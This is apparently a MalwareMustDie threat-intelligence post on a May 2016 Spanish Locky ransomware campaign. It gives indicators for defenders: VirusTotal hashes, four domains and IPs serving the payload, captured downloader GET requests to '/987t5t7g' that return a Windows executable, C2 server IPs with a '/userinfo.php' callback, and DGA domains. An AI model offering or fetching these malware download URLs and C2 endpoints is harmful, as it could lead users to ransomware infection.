Locky May18th 2016

1. #MalwareMustDie!!!
2.  
3. // Campaign malvertisement screenshot:
4.  
5. http://imgur.com/a/kXvah
6.  
7. // Virus Total Info:
8.  
9. 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
10. 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
11. 3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
12. 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
13. 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
14.  
15. // Payload info
16.  
17. This is Spain campaign of locky.
18. The downloaders are fetching locky from;
19.  
20. rproducciones.com has address 217.76.130.137
21. vonenidan.de has address 212.227.33.186
22. il.seroca.com has address 46.226.47.21
23. www.centroinfantilelmolino.com has address 217.76.156.98
24.  
25. // The IP are mostly located GERMANY not Italy, only one in Spain.
26.  
27. 217.76.130.137 | llge328.servidoresdns.net. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
28. 212.227.33.186 | hosting.web.de. |8560 | 212.227.0.0/16 | ONEANDONE | DE | 1and1.co.uk | 1&1 Internet AG
29. 46.226.47.21 | pl03.azamedia.net. & vz03.azamedia.net. |15699 | 46.226.40.0/21 | AS_ADAM | ES | azalorea.com | Azalorea S.L.
30. 217.76.156.98 | slgc573.piensasolutions.com. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
31.  
32. // PoC for verdict is as per follow:
33.  
34. 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
35.  
36. DOMAIN: rproducciones.com
37.  
38. GET /987t5t7g HTTP/1.1
39. Accept: */*
40. Accept-Encoding: gzip, deflate
41. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
42. Host: rproducciones.com
43. Connection: Keep-Alive
44.  
45.  
46. 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
47.  
48. DOMAIN: vonenidan.de
49.  
50. GET /987t5t7g HTTP/1.1
51. Accept: */*
52. Accept-Encoding: gzip, deflate
53. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
54. Host: vonenidan.de
55. Connection: Keep-Alive
56.  
57. HTTP/1.1 200 OK
58. Date: Wed, 18 May 2016 07:21:54 GMT
59. Server: Apache
60. Last-Modified: Mon, 16 May 2016 19:09:58 GMT
61. ETag: "a00008e2-58e00-532fa5ee0f256"
62. Accept-Ranges: bytes
63. Content-Length: 364032
64. Keep-Alive: timeout=2, max=200
65. Connection: Keep-Alive
66. Content-Type: application/x-dosexec
67.  
68. MZ.......
69.  
70. 3.  VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
71.  
72. HOSTNAME: il.seroca.com
73.  
74. GET /987t5t7g HTTP/1.1
75. Accept: */*
76. Accept-Encoding: gzip, deflate
77. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
78. Host: il.seroca.com
79. Connection: Keep-Alive
80.  
81. 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
82.  
83. DOMAIN: centroinfantilelmolino.com
84.  
85. GET /987t5t7g HTTP/1.1
86. Accept: */*
87. Accept-Encoding: gzip, deflate
88. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
89. Host: www.centroinfantilelmolino.com
90. Connection: Keep-Alive
91.  
92. 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
93.  
94. DOMAIN: vonenidan.de
95.  
96. GET /987t5t7g HTTP/1.1
97. Accept: */*
98. Accept-Encoding: gzip, deflate
99. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
100. Host: vonenidan.de
101. Connection: Keep-Alive
102.  
103. HTTP/1.1 200 OK
104. Date: Wed, 18 May 2016 07:11:25 GMT
105. Server: Apache
106. Last-Modified: Mon, 16 May 2016 19:09:58 GMT
107. ETag: "a00008e2-58e00-532fa5ee0f256"
108. Accept-Ranges: bytes
109. Content-Length: 364032
110. Keep-Alive: timeout=2, max=200
111. Connection: Keep-Alive
112. Content-Type: application/x-dosexec
113.  
114. MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
115.  
116. // CNC callback
117.  
118. Method: POST HTTP/1.1
119. Path:  /userinfo.php
120.  
121. // IP Info↓
122.  
123. 149.202.109.202
124. 188.127.231.124
125. 176.53.21.105
126. 217.12.199.151
127.  
128. // IP origin:
129.  
130. 149.202.109.202 |  |16276 | 149.202.0.0/16 | OVH | FR | ovh.com | OVH SAS
131. 188.127.231.124 |  |56694 | 188.127.231.0/24 | DHUB | RU | oversun.ru | Oversun Ltd
132. 176.53.21.105 | . |197328 | 176.53.21.0/24 | INETLTD | TR | turkrdns.com | Radore Veri Merkezi Hizmetleri A.S.
133. 217.12.199.151 | annakoval.itldc-customer.net. |15626 | 217.12.192.0/19 | ITLAS | UA | itl.net.ua | ITL Company
134.  
135. // DGA callback:
136.  
137. puufmpwtv.click
138. cduyeehncj.info
139. otmbbmbhptwmauf.work
140. wrbqohnk.xyz
141. srrsqaghjnbucwbyh.work
142. xgmypakuhgagcdug.pl
143. rexagurueqqiyic.biz
144. txqrjdtpeqedo.pw
145. ohwoaylllw.info
146. bkpmfqwmj.pl
147. lggynvfq.su
148.   :
149.   :
150.  
151. ---
152. MalwareMustDie, NPO -  the team.